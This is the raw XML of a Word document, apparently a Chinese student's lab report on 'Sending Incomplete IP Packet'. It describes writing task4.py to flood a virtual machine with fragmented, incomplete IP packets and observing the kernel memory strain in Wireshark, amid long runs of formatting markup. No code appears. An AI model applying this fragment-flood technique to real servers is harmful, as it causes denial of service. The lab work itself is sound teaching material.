            <wp:docPr id="44" name="图片 44" descr=")AV8I`Z}]N)3IZKI`Y78]8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)AV8I`Z}]N)3IZKI`Y78]8W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Task1D . Sending Incomplete IP Packet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实验目的——由VM A向VM M发送很多不完整的IP报文（报文由IP分片组成，但是有的IP分片会消失），用于对VM M实行拒绝服务攻击。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所有这些不完整的IP数据包将停留在内核中，直到它们超时。这可能会导致内核消耗大量内核内存，从而导致服务器上的拒绝服务攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/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  <w:t>Step1. 编写程序task4.py，实现从VM A向VM M发送大量不完整的IP报文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如下图所示，VM A向VM M发送大量不完整的IP报文，并且每个IP报文都缺少一定分片。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4844415" cy="3949700"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="42" name="图片 42" descr="MO7`54`CL0UYP_}SR2WO2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MO7`54`CL0UYP_}SR2WO23B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4441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  <w:t>Step2. 在VM M上用wireshark抓包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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如下图所示，VM M上抓到了数量极大的不完整的</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IP数据包，可以观察到虚拟机M的运行速度降低，虽然没能直接体现为拒绝服务，但是已经可以体现不完整的IP报文对虚拟机内核内存的消耗。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66055" cy="1527175"/>
            <wp:effectExtent l="0" t="0" r="4445" b="9525"/>
            <wp:docPr id="63" name="图片 63" descr="E4M4EPC(XKHR7SQ$)RR8JA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E4M4EPC(XKHR7SQ$)RR8JAV"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:srcRect b="99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BBBD7E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DBBBD7E9"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1．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．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．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．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．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．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．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．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．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DDBDB129"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DDBDB129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E8093824"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E8093824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20EACE29"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="20EACE2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4B4AED38"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4B4AED38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007DC"/>
    <w:rsid w:val="00423378"/>
    <w:rsid w:val="005A1FB2"/>
    <w:rsid w:val="007816AE"/>
    <w:rsid w:val="00823A4F"/>
    <w:rsid w:val="00A828ED"/>
    <w:rsid w:val="00C731EC"/>
    <w:rsid w:val="00DE22EE"/>
    <w:rsid w:val="012B2DC4"/>
    <w:rsid w:val="013F21EF"/>
    <w:rsid w:val="015377FF"/>
    <w:rsid w:val="01657A54"/>
    <w:rsid w:val="018E1604"/>
    <w:rsid w:val="01A47865"/>
    <w:rsid w:val="01B17C36"/>
    <w:rsid w:val="01FA6987"/>
    <w:rsid w:val="02045B44"/>
    <w:rsid w:val="0227360D"/>
    <w:rsid w:val="02623767"/>
    <w:rsid w:val="02674C1E"/>
    <w:rsid w:val="027B130B"/>
    <w:rsid w:val="02896C3E"/>
    <w:rsid w:val="0291600D"/>
    <w:rsid w:val="02AB6F33"/>
    <w:rsid w:val="02C70026"/>
    <w:rsid w:val="02CE223A"/>
    <w:rsid w:val="02EE5C00"/>
    <w:rsid w:val="02F81E0A"/>
    <w:rsid w:val="033761A0"/>
    <w:rsid w:val="033946B5"/>
    <w:rsid w:val="033B1184"/>
    <w:rsid w:val="033B188C"/>
    <w:rsid w:val="03444FD9"/>
    <w:rsid w:val="03503841"/>
    <w:rsid w:val="037934C6"/>
    <w:rsid w:val="037A3097"/>
    <w:rsid w:val="03CB7A5D"/>
    <w:rsid w:val="03FD70AF"/>
    <w:rsid w:val="040D6E22"/>
    <w:rsid w:val="041250BB"/>
    <w:rsid w:val="04312C2B"/>
    <w:rsid w:val="045942F7"/>
    <w:rsid w:val="04611AA2"/>
    <w:rsid w:val="04661A41"/>
    <w:rsid w:val="046A3DAC"/>
    <w:rsid w:val="046D0F45"/>
    <w:rsid w:val="04985A61"/>
    <w:rsid w:val="04A91800"/>
    <w:rsid w:val="04B524B2"/>
    <w:rsid w:val="04BC718F"/>
    <w:rsid w:val="04E15091"/>
    <w:rsid w:val="04E41073"/>
    <w:rsid w:val="05397937"/>
    <w:rsid w:val="054418FC"/>
    <w:rsid w:val="05532928"/>
    <w:rsid w:val="05683ADB"/>
    <w:rsid w:val="0591430C"/>
    <w:rsid w:val="059360E0"/>
    <w:rsid w:val="05B1617E"/>
    <w:rsid w:val="05CE75E1"/>
    <w:rsid w:val="06040233"/>
    <w:rsid w:val="06136EAF"/>
    <w:rsid w:val="06356F4C"/>
    <w:rsid w:val="06485FDE"/>
    <w:rsid w:val="069520F8"/>
    <w:rsid w:val="069C7D64"/>
    <w:rsid w:val="06E16F57"/>
    <w:rsid w:val="072D4BF3"/>
    <w:rsid w:val="07440DB4"/>
    <w:rsid w:val="074E453B"/>
    <w:rsid w:val="077274F4"/>
    <w:rsid w:val="0774142C"/>
    <w:rsid w:val="07991B55"/>
    <w:rsid w:val="07BA3E24"/>
    <w:rsid w:val="07C571A0"/>
    <w:rsid w:val="08314FCD"/>
    <w:rsid w:val="0871551B"/>
    <w:rsid w:val="0882236F"/>
    <w:rsid w:val="08A80F01"/>
    <w:rsid w:val="08E2148E"/>
    <w:rsid w:val="093307A3"/>
    <w:rsid w:val="094128CB"/>
    <w:rsid w:val="09413D1B"/>
    <w:rsid w:val="09424452"/>
    <w:rsid w:val="095963FF"/>
    <w:rsid w:val="09832117"/>
    <w:rsid w:val="09FC3714"/>
    <w:rsid w:val="0A293459"/>
    <w:rsid w:val="0A5C2108"/>
    <w:rsid w:val="0A701AD1"/>
    <w:rsid w:val="0AA51E3A"/>
    <w:rsid w:val="0AC52C97"/>
    <w:rsid w:val="0B0B2695"/>
    <w:rsid w:val="0B374CD0"/>
    <w:rsid w:val="0B3D724D"/>
    <w:rsid w:val="0B4C2BC9"/>
    <w:rsid w:val="0B6E59D6"/>
    <w:rsid w:val="0B871CF8"/>
    <w:rsid w:val="0B983811"/>
    <w:rsid w:val="0BB56FEE"/>
    <w:rsid w:val="0BC01556"/>
    <w:rsid w:val="0BC50B98"/>
    <w:rsid w:val="0BC5796E"/>
    <w:rsid w:val="0BCA50E1"/>
    <w:rsid w:val="0BD62F83"/>
    <w:rsid w:val="0BE53343"/>
    <w:rsid w:val="0BEC16C3"/>
    <w:rsid w:val="0C0F3006"/>
    <w:rsid w:val="0C176B4C"/>
    <w:rsid w:val="0C307111"/>
    <w:rsid w:val="0C6F01BC"/>
    <w:rsid w:val="0C7C1F29"/>
    <w:rsid w:val="0C7C70CC"/>
    <w:rsid w:val="0C7F1B9C"/>
    <w:rsid w:val="0C8131FF"/>
    <w:rsid w:val="0CC01DBA"/>
    <w:rsid w:val="0D1728A6"/>
    <w:rsid w:val="0D4F0430"/>
    <w:rsid w:val="0D57112C"/>
    <w:rsid w:val="0D8570E3"/>
    <w:rsid w:val="0D955547"/>
    <w:rsid w:val="0DB24AA8"/>
    <w:rsid w:val="0DC25C7F"/>
    <w:rsid w:val="0DF3547A"/>
    <w:rsid w:val="0E160103"/>
    <w:rsid w:val="0E162301"/>
    <w:rsid w:val="0E2470EA"/>
    <w:rsid w:val="0E2A0A3F"/>
    <w:rsid w:val="0E2C57D5"/>
    <w:rsid w:val="0E2E1224"/>
    <w:rsid w:val="0E2F5380"/>
    <w:rsid w:val="0E59670E"/>
    <w:rsid w:val="0E993408"/>
    <w:rsid w:val="0E9D39D7"/>
    <w:rsid w:val="0EAC2101"/>
    <w:rsid w:val="0EC12D3A"/>
    <w:rsid w:val="0ED25C51"/>
    <w:rsid w:val="0EF8712B"/>
    <w:rsid w:val="0F2D7B0D"/>
    <w:rsid w:val="0F54368C"/>
    <w:rsid w:val="0F5E1B6D"/>
    <w:rsid w:val="0FA86E17"/>
    <w:rsid w:val="0FC973BA"/>
    <w:rsid w:val="100A19B8"/>
    <w:rsid w:val="10154FF6"/>
    <w:rsid w:val="101B4A31"/>
    <w:rsid w:val="104468A3"/>
    <w:rsid w:val="10521F2E"/>
    <w:rsid w:val="10756A44"/>
    <w:rsid w:val="109043AA"/>
    <w:rsid w:val="10995E44"/>
    <w:rsid w:val="109B463D"/>
    <w:rsid w:val="10A51823"/>
    <w:rsid w:val="10B44575"/>
    <w:rsid w:val="10CC5A59"/>
    <w:rsid w:val="10D26297"/>
    <w:rsid w:val="10E839A2"/>
    <w:rsid w:val="115F170F"/>
    <w:rsid w:val="11894A12"/>
    <w:rsid w:val="118E64C9"/>
    <w:rsid w:val="118F245E"/>
    <w:rsid w:val="11AB5BF2"/>
    <w:rsid w:val="11AC00A9"/>
    <w:rsid w:val="11B30B33"/>
    <w:rsid w:val="11C976EE"/>
    <w:rsid w:val="11DA43B2"/>
    <w:rsid w:val="11DC6C53"/>
    <w:rsid w:val="11E57B34"/>
    <w:rsid w:val="11F41F30"/>
    <w:rsid w:val="11FD4343"/>
    <w:rsid w:val="11FE57A6"/>
    <w:rsid w:val="12127476"/>
    <w:rsid w:val="124D6761"/>
    <w:rsid w:val="12507D59"/>
    <w:rsid w:val="12592E00"/>
    <w:rsid w:val="1271310D"/>
    <w:rsid w:val="12713CF0"/>
    <w:rsid w:val="12725B2A"/>
    <w:rsid w:val="129B6BB7"/>
    <w:rsid w:val="129F1AFB"/>
    <w:rsid w:val="12A739F3"/>
    <w:rsid w:val="12AC57FF"/>
    <w:rsid w:val="12D064E0"/>
    <w:rsid w:val="12E847BC"/>
    <w:rsid w:val="1324457F"/>
    <w:rsid w:val="13310774"/>
    <w:rsid w:val="1339324F"/>
    <w:rsid w:val="136812C3"/>
    <w:rsid w:val="136A4325"/>
    <w:rsid w:val="136B4CDE"/>
    <w:rsid w:val="137E2E6A"/>
    <w:rsid w:val="139763E3"/>
    <w:rsid w:val="13B64FE4"/>
    <w:rsid w:val="13D4286F"/>
    <w:rsid w:val="13DA65ED"/>
    <w:rsid w:val="13EC7B9D"/>
    <w:rsid w:val="140655D4"/>
    <w:rsid w:val="140A5564"/>
    <w:rsid w:val="144F3885"/>
    <w:rsid w:val="147922FD"/>
    <w:rsid w:val="149D0FA8"/>
    <w:rsid w:val="14CC1811"/>
    <w:rsid w:val="14CE158D"/>
    <w:rsid w:val="14E26FDA"/>
    <w:rsid w:val="151C3228"/>
    <w:rsid w:val="15226F76"/>
    <w:rsid w:val="157D2356"/>
    <w:rsid w:val="158C5073"/>
    <w:rsid w:val="158D0D8A"/>
    <w:rsid w:val="15B05F5C"/>
    <w:rsid w:val="15C40FB2"/>
    <w:rsid w:val="15C83EC6"/>
    <w:rsid w:val="15C85165"/>
    <w:rsid w:val="15CF1935"/>
    <w:rsid w:val="15E101C9"/>
    <w:rsid w:val="160C5F3E"/>
    <w:rsid w:val="16231B13"/>
    <w:rsid w:val="164322D7"/>
    <w:rsid w:val="16652C24"/>
    <w:rsid w:val="16753542"/>
    <w:rsid w:val="16E45E37"/>
    <w:rsid w:val="16F60DAD"/>
    <w:rsid w:val="171118A4"/>
    <w:rsid w:val="17111F3D"/>
    <w:rsid w:val="17297D89"/>
    <w:rsid w:val="175E59B8"/>
    <w:rsid w:val="17622BE9"/>
    <w:rsid w:val="17715369"/>
    <w:rsid w:val="17873764"/>
    <w:rsid w:val="17925F8D"/>
    <w:rsid w:val="17946F30"/>
    <w:rsid w:val="179D43B5"/>
    <w:rsid w:val="17A63031"/>
    <w:rsid w:val="17AF3723"/>
    <w:rsid w:val="17B46237"/>
    <w:rsid w:val="17C94D7A"/>
    <w:rsid w:val="17D030B8"/>
    <w:rsid w:val="1806751B"/>
    <w:rsid w:val="180D2ED9"/>
    <w:rsid w:val="1820460C"/>
    <w:rsid w:val="18236A1C"/>
    <w:rsid w:val="182732F7"/>
    <w:rsid w:val="182D0CC0"/>
    <w:rsid w:val="18844D0F"/>
    <w:rsid w:val="18937956"/>
    <w:rsid w:val="18995C39"/>
    <w:rsid w:val="189D0F0D"/>
    <w:rsid w:val="18CE65A6"/>
    <w:rsid w:val="18F74372"/>
    <w:rsid w:val="192B713A"/>
    <w:rsid w:val="192F2CF3"/>
    <w:rsid w:val="193407AF"/>
    <w:rsid w:val="193436A2"/>
    <w:rsid w:val="196E00EE"/>
    <w:rsid w:val="19A873A2"/>
    <w:rsid w:val="19CA2215"/>
    <w:rsid w:val="19CD609F"/>
    <w:rsid w:val="19DB26E5"/>
    <w:rsid w:val="19FF3A50"/>
    <w:rsid w:val="1A0321C5"/>
    <w:rsid w:val="1A0973D2"/>
    <w:rsid w:val="1A1634A9"/>
    <w:rsid w:val="1A482B8D"/>
    <w:rsid w:val="1A8048EB"/>
    <w:rsid w:val="1A922C34"/>
    <w:rsid w:val="1A941D43"/>
    <w:rsid w:val="1A9460D2"/>
    <w:rsid w:val="1B1A3C40"/>
    <w:rsid w:val="1B1A3D43"/>
    <w:rsid w:val="1B1E6329"/>
    <w:rsid w:val="1B1F0F9E"/>
    <w:rsid w:val="1B555F4C"/>
    <w:rsid w:val="1B6A2DE4"/>
    <w:rsid w:val="1B977429"/>
    <w:rsid w:val="1BAC49E3"/>
    <w:rsid w:val="1BB37BE5"/>
    <w:rsid w:val="1BC77F76"/>
    <w:rsid w:val="1BE835ED"/>
    <w:rsid w:val="1C25392F"/>
    <w:rsid w:val="1C256BFC"/>
    <w:rsid w:val="1C3B0148"/>
    <w:rsid w:val="1C3D1E6F"/>
    <w:rsid w:val="1C5446B6"/>
    <w:rsid w:val="1C557D68"/>
    <w:rsid w:val="1C5B1FB0"/>
    <w:rsid w:val="1C615B7E"/>
    <w:rsid w:val="1C7D471C"/>
    <w:rsid w:val="1C852B22"/>
    <w:rsid w:val="1C956C36"/>
    <w:rsid w:val="1CA13FF0"/>
    <w:rsid w:val="1D240B47"/>
    <w:rsid w:val="1D2414C1"/>
    <w:rsid w:val="1D26501F"/>
    <w:rsid w:val="1D4246DF"/>
    <w:rsid w:val="1D5865C9"/>
    <w:rsid w:val="1D60728C"/>
    <w:rsid w:val="1D7F5428"/>
    <w:rsid w:val="1D8A1A87"/>
    <w:rsid w:val="1D9352EB"/>
    <w:rsid w:val="1D9E3B92"/>
    <w:rsid w:val="1DAA63DB"/>
    <w:rsid w:val="1DD14882"/>
    <w:rsid w:val="1E0B38EC"/>
    <w:rsid w:val="1E342C82"/>
    <w:rsid w:val="1E4A46AA"/>
    <w:rsid w:val="1E4D065C"/>
    <w:rsid w:val="1E503873"/>
    <w:rsid w:val="1E5E3095"/>
    <w:rsid w:val="1E6B4B5B"/>
    <w:rsid w:val="1E9B01E4"/>
    <w:rsid w:val="1EF973CC"/>
    <w:rsid w:val="1F1E4A03"/>
    <w:rsid w:val="1F234676"/>
    <w:rsid w:val="1F33542F"/>
    <w:rsid w:val="1F415812"/>
    <w:rsid w:val="1F474DC6"/>
    <w:rsid w:val="1F7312B3"/>
    <w:rsid w:val="1F9536E3"/>
    <w:rsid w:val="1F9F6E31"/>
    <w:rsid w:val="1FF7476D"/>
    <w:rsid w:val="200C6104"/>
    <w:rsid w:val="20150C6C"/>
    <w:rsid w:val="20154CA0"/>
    <w:rsid w:val="20196817"/>
    <w:rsid w:val="201C7C6D"/>
    <w:rsid w:val="20410154"/>
    <w:rsid w:val="20616484"/>
    <w:rsid w:val="207841EB"/>
    <w:rsid w:val="207B20A9"/>
    <w:rsid w:val="20862951"/>
    <w:rsid w:val="209A3A4F"/>
    <w:rsid w:val="20B07410"/>
    <w:rsid w:val="20B918E4"/>
    <w:rsid w:val="20BF5139"/>
    <w:rsid w:val="210846A2"/>
    <w:rsid w:val="211771BF"/>
    <w:rsid w:val="215F148D"/>
    <w:rsid w:val="21705B54"/>
    <w:rsid w:val="21A7052E"/>
    <w:rsid w:val="21AD0498"/>
    <w:rsid w:val="21C90BC8"/>
    <w:rsid w:val="21E51665"/>
    <w:rsid w:val="21E92699"/>
    <w:rsid w:val="22236400"/>
    <w:rsid w:val="22275D82"/>
    <w:rsid w:val="222F6F6D"/>
    <w:rsid w:val="22355A0C"/>
    <w:rsid w:val="224D15C7"/>
    <w:rsid w:val="22617FA9"/>
    <w:rsid w:val="22687BE3"/>
    <w:rsid w:val="22701C91"/>
    <w:rsid w:val="22A00C29"/>
    <w:rsid w:val="22E875FF"/>
    <w:rsid w:val="22F612B8"/>
    <w:rsid w:val="2384174F"/>
    <w:rsid w:val="23922ED3"/>
    <w:rsid w:val="23AB2499"/>
    <w:rsid w:val="23D966D5"/>
    <w:rsid w:val="242C6783"/>
    <w:rsid w:val="248F33A7"/>
    <w:rsid w:val="24931EA3"/>
    <w:rsid w:val="24B360A5"/>
    <w:rsid w:val="24E65410"/>
    <w:rsid w:val="24EB2F75"/>
    <w:rsid w:val="24EE2AC7"/>
    <w:rsid w:val="24F13A19"/>
    <w:rsid w:val="253D2050"/>
    <w:rsid w:val="255951DC"/>
    <w:rsid w:val="255E6D7F"/>
    <w:rsid w:val="257A0A62"/>
    <w:rsid w:val="25876F2C"/>
    <w:rsid w:val="25A32A01"/>
    <w:rsid w:val="25A607C2"/>
    <w:rsid w:val="25B946F7"/>
    <w:rsid w:val="25D916DC"/>
    <w:rsid w:val="25F267A6"/>
    <w:rsid w:val="261E76EA"/>
    <w:rsid w:val="266A3933"/>
    <w:rsid w:val="26A15C99"/>
    <w:rsid w:val="26AA7833"/>
    <w:rsid w:val="26BD6A60"/>
    <w:rsid w:val="26DE654B"/>
    <w:rsid w:val="27385B3A"/>
    <w:rsid w:val="273C3FE7"/>
    <w:rsid w:val="274400CD"/>
    <w:rsid w:val="274E71D9"/>
    <w:rsid w:val="27533A16"/>
    <w:rsid w:val="275526FC"/>
    <w:rsid w:val="276C6C24"/>
    <w:rsid w:val="27921266"/>
    <w:rsid w:val="27A5737E"/>
    <w:rsid w:val="27D7307E"/>
    <w:rsid w:val="27F4701D"/>
    <w:rsid w:val="280766F3"/>
    <w:rsid w:val="280A54EE"/>
    <w:rsid w:val="28502D3B"/>
    <w:rsid w:val="288261BD"/>
    <w:rsid w:val="288B4C32"/>
    <w:rsid w:val="289803AF"/>
    <w:rsid w:val="28A91135"/>
    <w:rsid w:val="28B87CAC"/>
    <w:rsid w:val="28C0754C"/>
    <w:rsid w:val="28E94803"/>
    <w:rsid w:val="28EA109F"/>
    <w:rsid w:val="2904534D"/>
    <w:rsid w:val="290E6A57"/>
    <w:rsid w:val="2927472C"/>
    <w:rsid w:val="293C04D1"/>
    <w:rsid w:val="295716F9"/>
    <w:rsid w:val="296033BC"/>
    <w:rsid w:val="2964000D"/>
    <w:rsid w:val="29917E59"/>
    <w:rsid w:val="29B84D3A"/>
    <w:rsid w:val="29C454BC"/>
    <w:rsid w:val="29CC021B"/>
    <w:rsid w:val="29D14759"/>
    <w:rsid w:val="29ED50EE"/>
    <w:rsid w:val="2A014071"/>
    <w:rsid w:val="2A1C00F2"/>
    <w:rsid w:val="2A5D0A05"/>
    <w:rsid w:val="2A6D3C99"/>
    <w:rsid w:val="2A7B7B90"/>
    <w:rsid w:val="2AFE4363"/>
    <w:rsid w:val="2B0277A9"/>
    <w:rsid w:val="2B040413"/>
    <w:rsid w:val="2B15775F"/>
    <w:rsid w:val="2B296C26"/>
    <w:rsid w:val="2B3B46E7"/>
    <w:rsid w:val="2B713EDE"/>
    <w:rsid w:val="2B7F4890"/>
    <w:rsid w:val="2B852893"/>
    <w:rsid w:val="2BD3547C"/>
    <w:rsid w:val="2BD719A6"/>
    <w:rsid w:val="2BDC5290"/>
    <w:rsid w:val="2BE208FF"/>
    <w:rsid w:val="2C225223"/>
    <w:rsid w:val="2C2A54EF"/>
    <w:rsid w:val="2C3819B8"/>
    <w:rsid w:val="2C460F43"/>
    <w:rsid w:val="2C4E2C9F"/>
    <w:rsid w:val="2C8824D4"/>
    <w:rsid w:val="2C9D6990"/>
    <w:rsid w:val="2CDC2DB7"/>
    <w:rsid w:val="2D0341FD"/>
    <w:rsid w:val="2D3D06E2"/>
    <w:rsid w:val="2D56245D"/>
    <w:rsid w:val="2D613538"/>
    <w:rsid w:val="2D89369C"/>
    <w:rsid w:val="2DAF7E7E"/>
    <w:rsid w:val="2DD2320B"/>
    <w:rsid w:val="2DD53689"/>
    <w:rsid w:val="2DD939D4"/>
    <w:rsid w:val="2DE35837"/>
    <w:rsid w:val="2DFD3C22"/>
    <w:rsid w:val="2E1C28B9"/>
    <w:rsid w:val="2E367BE8"/>
    <w:rsid w:val="2E616C9F"/>
    <w:rsid w:val="2E7E0FBA"/>
    <w:rsid w:val="2EB943F3"/>
    <w:rsid w:val="2EBA073D"/>
    <w:rsid w:val="2EE56B95"/>
    <w:rsid w:val="2F053185"/>
    <w:rsid w:val="2F5A6F86"/>
    <w:rsid w:val="2F9C259D"/>
    <w:rsid w:val="2FD212F6"/>
    <w:rsid w:val="2FEA149D"/>
    <w:rsid w:val="2FF95AD3"/>
    <w:rsid w:val="30390014"/>
    <w:rsid w:val="303E64F2"/>
    <w:rsid w:val="303F0D3C"/>
    <w:rsid w:val="30527177"/>
    <w:rsid w:val="307522A5"/>
    <w:rsid w:val="30843347"/>
    <w:rsid w:val="30862C6E"/>
    <w:rsid w:val="309A6A6D"/>
    <w:rsid w:val="30B10BC0"/>
    <w:rsid w:val="30B4323D"/>
    <w:rsid w:val="30F864E9"/>
    <w:rsid w:val="314519F7"/>
    <w:rsid w:val="315B15E2"/>
    <w:rsid w:val="31636F42"/>
    <w:rsid w:val="31B96A0D"/>
    <w:rsid w:val="31D72835"/>
    <w:rsid w:val="31FB7120"/>
    <w:rsid w:val="31FF2975"/>
    <w:rsid w:val="32035958"/>
    <w:rsid w:val="32245D35"/>
    <w:rsid w:val="3256045D"/>
    <w:rsid w:val="32795744"/>
    <w:rsid w:val="3281400B"/>
    <w:rsid w:val="32A242E7"/>
    <w:rsid w:val="32B04E06"/>
    <w:rsid w:val="32B801DF"/>
    <w:rsid w:val="32BB72FA"/>
    <w:rsid w:val="32DE7E15"/>
    <w:rsid w:val="332A1A5F"/>
    <w:rsid w:val="33375063"/>
    <w:rsid w:val="337323C8"/>
    <w:rsid w:val="339D3C73"/>
    <w:rsid w:val="33E705E1"/>
    <w:rsid w:val="33F61D36"/>
    <w:rsid w:val="33F76AA4"/>
    <w:rsid w:val="33FD0A06"/>
    <w:rsid w:val="340C4627"/>
    <w:rsid w:val="340F6D59"/>
    <w:rsid w:val="3419386C"/>
    <w:rsid w:val="342E368A"/>
    <w:rsid w:val="343A39FC"/>
    <w:rsid w:val="3448324D"/>
    <w:rsid w:val="34510A75"/>
    <w:rsid w:val="345C4202"/>
    <w:rsid w:val="346A3FB6"/>
    <w:rsid w:val="34771396"/>
    <w:rsid w:val="348F2B33"/>
    <w:rsid w:val="34B25AEB"/>
    <w:rsid w:val="34EB7336"/>
    <w:rsid w:val="34F14382"/>
    <w:rsid w:val="3508666E"/>
    <w:rsid w:val="351E2523"/>
    <w:rsid w:val="351E3351"/>
    <w:rsid w:val="355C7C40"/>
    <w:rsid w:val="356760AA"/>
    <w:rsid w:val="35BD0EFA"/>
    <w:rsid w:val="35C91E43"/>
    <w:rsid w:val="35C947E7"/>
    <w:rsid w:val="35E27202"/>
    <w:rsid w:val="35F738F9"/>
    <w:rsid w:val="363A25A6"/>
    <w:rsid w:val="36725512"/>
    <w:rsid w:val="36787336"/>
    <w:rsid w:val="368F0A18"/>
    <w:rsid w:val="36A20BEF"/>
    <w:rsid w:val="36B2081E"/>
    <w:rsid w:val="36BF0F18"/>
    <w:rsid w:val="36C47EF5"/>
    <w:rsid w:val="36D755A1"/>
    <w:rsid w:val="371F6509"/>
    <w:rsid w:val="372315B8"/>
    <w:rsid w:val="37395E52"/>
    <w:rsid w:val="37521FE5"/>
    <w:rsid w:val="3764318E"/>
    <w:rsid w:val="37824403"/>
    <w:rsid w:val="37DC6A0A"/>
    <w:rsid w:val="37E13AC5"/>
    <w:rsid w:val="37E20906"/>
    <w:rsid w:val="38002E12"/>
    <w:rsid w:val="38677D1B"/>
    <w:rsid w:val="386C664F"/>
    <w:rsid w:val="386E6E9E"/>
    <w:rsid w:val="388A6D08"/>
    <w:rsid w:val="389525D7"/>
    <w:rsid w:val="38CF6368"/>
    <w:rsid w:val="38DA1CEE"/>
    <w:rsid w:val="38E952A5"/>
    <w:rsid w:val="38F433E4"/>
    <w:rsid w:val="38F57FED"/>
    <w:rsid w:val="38F61862"/>
    <w:rsid w:val="391454EB"/>
    <w:rsid w:val="39253149"/>
    <w:rsid w:val="395D66E3"/>
    <w:rsid w:val="39973992"/>
    <w:rsid w:val="39AB2061"/>
    <w:rsid w:val="39B94AC4"/>
    <w:rsid w:val="39BD7A20"/>
    <w:rsid w:val="39D329B8"/>
    <w:rsid w:val="39DC465E"/>
    <w:rsid w:val="39DE6EFB"/>
    <w:rsid w:val="39EE3E6A"/>
    <w:rsid w:val="39F3388A"/>
    <w:rsid w:val="3A043970"/>
    <w:rsid w:val="3A1A0330"/>
    <w:rsid w:val="3A2B251A"/>
    <w:rsid w:val="3A42348D"/>
    <w:rsid w:val="3A425759"/>
    <w:rsid w:val="3A5E19B8"/>
    <w:rsid w:val="3A644766"/>
    <w:rsid w:val="3A78235B"/>
    <w:rsid w:val="3A802F48"/>
    <w:rsid w:val="3AA74439"/>
    <w:rsid w:val="3ACA2161"/>
    <w:rsid w:val="3ADD2C94"/>
    <w:rsid w:val="3AE6194F"/>
    <w:rsid w:val="3AE93C88"/>
    <w:rsid w:val="3AF03AD6"/>
    <w:rsid w:val="3B0222D4"/>
    <w:rsid w:val="3B0D32D2"/>
    <w:rsid w:val="3B417C1E"/>
    <w:rsid w:val="3B463707"/>
    <w:rsid w:val="3B9423E4"/>
    <w:rsid w:val="3BA075DD"/>
    <w:rsid w:val="3BAB1263"/>
    <w:rsid w:val="3BB24413"/>
    <w:rsid w:val="3BBC4B76"/>
    <w:rsid w:val="3BCE783A"/>
    <w:rsid w:val="3BE51CB2"/>
    <w:rsid w:val="3C7B376C"/>
    <w:rsid w:val="3C8E7F3B"/>
    <w:rsid w:val="3CEE403F"/>
    <w:rsid w:val="3D7B11A3"/>
    <w:rsid w:val="3DA42498"/>
    <w:rsid w:val="3DCA7BCE"/>
    <w:rsid w:val="3DCB7D3B"/>
    <w:rsid w:val="3E033570"/>
    <w:rsid w:val="3E305B0F"/>
    <w:rsid w:val="3E5929DC"/>
    <w:rsid w:val="3E610800"/>
    <w:rsid w:val="3E747FFA"/>
    <w:rsid w:val="3E8870FF"/>
    <w:rsid w:val="3EC55B0A"/>
    <w:rsid w:val="3EDE63B1"/>
    <w:rsid w:val="3F044A03"/>
    <w:rsid w:val="3F0A29E6"/>
    <w:rsid w:val="3F286F8E"/>
    <w:rsid w:val="3F885F7E"/>
    <w:rsid w:val="3FA30417"/>
    <w:rsid w:val="3FAB1245"/>
    <w:rsid w:val="3FBA7063"/>
    <w:rsid w:val="3FC26E42"/>
    <w:rsid w:val="3FE9608F"/>
    <w:rsid w:val="3FFA16C1"/>
    <w:rsid w:val="40004864"/>
    <w:rsid w:val="402D3F9E"/>
    <w:rsid w:val="402F679A"/>
    <w:rsid w:val="40631259"/>
    <w:rsid w:val="407336BE"/>
    <w:rsid w:val="407A2177"/>
    <w:rsid w:val="40A37045"/>
    <w:rsid w:val="40DF0119"/>
    <w:rsid w:val="40E27308"/>
    <w:rsid w:val="40F1536E"/>
    <w:rsid w:val="412D57AC"/>
    <w:rsid w:val="414C3ED8"/>
    <w:rsid w:val="41637315"/>
    <w:rsid w:val="41662227"/>
    <w:rsid w:val="41730873"/>
    <w:rsid w:val="41744944"/>
    <w:rsid w:val="41B51EBD"/>
    <w:rsid w:val="41C939CA"/>
    <w:rsid w:val="41ED16D5"/>
    <w:rsid w:val="421D10F9"/>
    <w:rsid w:val="42802384"/>
    <w:rsid w:val="428A5FD0"/>
    <w:rsid w:val="4290373D"/>
    <w:rsid w:val="429F4F0A"/>
    <w:rsid w:val="42C0237D"/>
    <w:rsid w:val="42C26569"/>
    <w:rsid w:val="42C27FFF"/>
    <w:rsid w:val="42CE585B"/>
    <w:rsid w:val="42CE6083"/>
    <w:rsid w:val="42D028CF"/>
    <w:rsid w:val="42E14A6B"/>
    <w:rsid w:val="42EF0063"/>
    <w:rsid w:val="430A65BA"/>
    <w:rsid w:val="43135CE2"/>
    <w:rsid w:val="432115A0"/>
    <w:rsid w:val="432F05FF"/>
    <w:rsid w:val="43642E4E"/>
    <w:rsid w:val="436B0844"/>
    <w:rsid w:val="436C4F59"/>
    <w:rsid w:val="43762175"/>
    <w:rsid w:val="437934A3"/>
    <w:rsid w:val="439B581E"/>
    <w:rsid w:val="43F36944"/>
    <w:rsid w:val="44327E2A"/>
    <w:rsid w:val="44346111"/>
    <w:rsid w:val="44517084"/>
    <w:rsid w:val="44520A1D"/>
    <w:rsid w:val="445921BA"/>
    <w:rsid w:val="446B4E81"/>
    <w:rsid w:val="44D35968"/>
    <w:rsid w:val="44DE1BB3"/>
    <w:rsid w:val="44EA3CE7"/>
    <w:rsid w:val="452E6FB1"/>
    <w:rsid w:val="4582334D"/>
    <w:rsid w:val="45830500"/>
